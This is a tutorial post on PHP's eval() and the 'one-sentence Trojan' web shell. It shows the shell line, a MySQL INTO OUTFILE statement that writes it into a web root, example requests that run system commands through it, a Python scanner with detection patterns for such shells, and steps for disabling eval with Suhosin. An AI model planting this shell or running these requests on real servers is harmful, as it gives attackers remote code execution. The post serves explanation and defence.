Introduction to the eval function and analysis of the PHP one-sentence Trojan
Hello everyone, I am Carol, and my QQ is 906871417.
I. The eval function
1. eval() evaluates a string as PHP code.
2. The string must be valid PHP code and must end with a semicolon.
3. If the code string does not execute a return statement, eval() returns NULL. In PHP 5 a parse error in the string makes eval() return false; from PHP 7 on it throws a ParseError instead.
II. General usage of eval
<?php
$string = "beautiful";
$time = "winter";
// Single quotes: $string and $time are NOT interpolated here.
$str = 'This is a $string $time morning!';
echo $str . "<br>";
// Builds the statement  $str = "This is a $string $time morning!";
// and runs it; the double-quoted string is now interpolated.
eval("\$str = \"$str\";");
echo $str;
?>
Output:
This is a $string $time morning!
This is a beautiful winter morning!
The first echo prints the single-quoted literal unchanged. The eval() call assembles a new assignment in which the same text sits inside double quotes, so when PHP compiles and runs that statement the variables are substituted.
III. Special usage of eval
<?php
eval($_GET["cmd"]);
?>
This single line is the "one-sentence Trojan": whatever the client sends in the cmd parameter is compiled and executed as PHP on the server.
IV. How the PHP one-sentence Trojan works
1. Writing the shell through the database:
select "<?php eval($_GET['cmd']); ?>" into outfile "D:\\phpStudy\\WWW\\bb.php";
This only works when the database and the web server run on the same machine (the file is written by the MySQL process, so it must land inside the local web root); the MySQL account also needs the FILE privilege and secure_file_priv must not restrict the target directory.
2. Writing the shell through the web:
<?php
eval($_GET["cmd"]);
?>
Once aa.php is in the web root, requests to it run arbitrary PHP (in a real request the payload would be URL-encoded):
Write a file:
http://localhost/aa.php?cmd=fwrite(fopen("aa.txt","w"),"hello,world!");
Show the PHP configuration:
http://localhost/aa.php?cmd=phpinfo();
List the running Windows services:
http://localhost/aa.php?cmd=system("net start");
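The defensive counterpart to the shell above is finding it. The following scanner is an added example written for this page, not code from the original post: it flags the one-sentence Trojan pattern (a code sink such as eval() fed straight from a superglobal) in PHP source, and flags access-log requests whose query parameters carry PHP calls like the aa.php?cmd=phpinfo() request shown above. The sink list, the file contents and the log lines are constructed samples, not the page's own data.

```python
# Added example, not code from the original post: a scanner for the
# one-sentence trojan pattern the post describes (a code sink such as eval()
# fed straight from a superglobal) and for access-log requests that carry PHP
# code to it. File contents and log lines below are constructed samples.
import re
from urllib.parse import urlsplit, parse_qs

# Sinks that execute a string as PHP code, and the superglobals a
# one-sentence trojan reads its payload from.
CODE_SINKS = r"(?:eval|assert|create_function|call_user_func|preg_replace)"
INPUT_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"

# Matches e.g. eval($_GET["cmd"]) or @eval($_POST['x']), with anything short
# of a statement terminator between the sink's "(" and the superglobal.
SHELL_RE = re.compile(
    r"@?\s*" + CODE_SINKS + r"\s*\(\s*[^;]*?" + INPUT_SOURCES, re.IGNORECASE)

# PHP functions an attacker typically calls through such a shell.
SUSPICIOUS_CALL = re.compile(
    r"\b(?:phpinfo|system|exec|shell_exec|passthru|popen|proc_open|"
    r"fwrite|fopen|file_put_contents|assert|eval)\s*\(",
    re.IGNORECASE)


def find_shells(files):
    """files: {filename: content}. Returns (filename, line number, matched
    text) for every line that feeds a superglobal into a code sink."""
    hits = []
    for name, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            m = SHELL_RE.search(line)
            if m:
                hits.append((name, lineno, m.group(0).strip()))
    return hits


def suspicious_requests(log_lines):
    """Returns (path, parameter, decoded value) for requests whose query
    string carries a PHP function call, as in aa.php?cmd=phpinfo()."""
    found = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes the values, so %22 becomes a quote.
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                if SUSPICIOUS_CALL.search(value):
                    found.append((url.path, param, value))
    return found


# Constructed samples: two shells (one is the post's aa.php) and a clean file.
SAMPLE_FILES = {
    "aa.php": '<?php\neval($_GET["cmd"]);\n?>\n',
    "bb.php": "<?php @eval($_POST['cmd']); ?>",
    "index.php": "<?php\n$page = 'home';\necho $page;\n",
}

# Constructed access-log lines in the common log format; the payloads are
# percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2023:12:00:00 +0000] "GET /aa.php?cmd=phpinfo() HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:01 +0000] "GET /aa.php?cmd=fwrite(fopen(%22aa.txt%22,%22w%22),%22hello,world!%22)%3B HTTP/1.1" 200 12',
    '127.0.0.1 - - [10/Oct/2023:12:00:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for name, lineno, text in find_shells(SAMPLE_FILES):
        print(f"shell candidate: {name}:{lineno}: {text}")
    for path, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"code in request: {path} {param}={value}")
```

Run it against a real web root by reading each .php file into the dictionary and feeding the web server's access log to suspicious_requests(); a hit from find_shells() is a file to quarantine and a hit from suspicious_requests() shows which shell was used and what was executed through it. The patterns are deliberately broad (any sink reading any superglobal), so expect to triage a few legitimate matches by hand.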
V. Disabling eval
Whether the server runs Linux or Windows, eval is very dangerous.
How to disable eval
Setting disable_functions = eval in php.ini does not disable eval. As the PHP manual explains, eval is a language construct rather than a function, so disable_functions (which does work for ordinary functions such as system()) cannot reach it. To disable eval you need a third-party extension, Suhosin. Note that Suhosin's releases target PHP 5; it is not available for current PHP versions.
Linux installation:
The PHP installation itself is not covered here.
Suhosin installation
wget http://download.suhosin.org/suhosin-0.9.23.tgz
tar zxvf suhosin-0.9.23.tgz
cd suhosin-0.9.23
/usr/local/php/bin/phpize    # this step cannot be skipped
./configure --with-php-config=/usr/local/php/bin/php-config    # the absolute path to php-config must be given here
make
make install
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20060613/
Add the following lines to php.ini:
extension=suhosin.so
suhosin.executor.disable_eval=on
Reference: http://ju.outofmemory.cn/entry/29300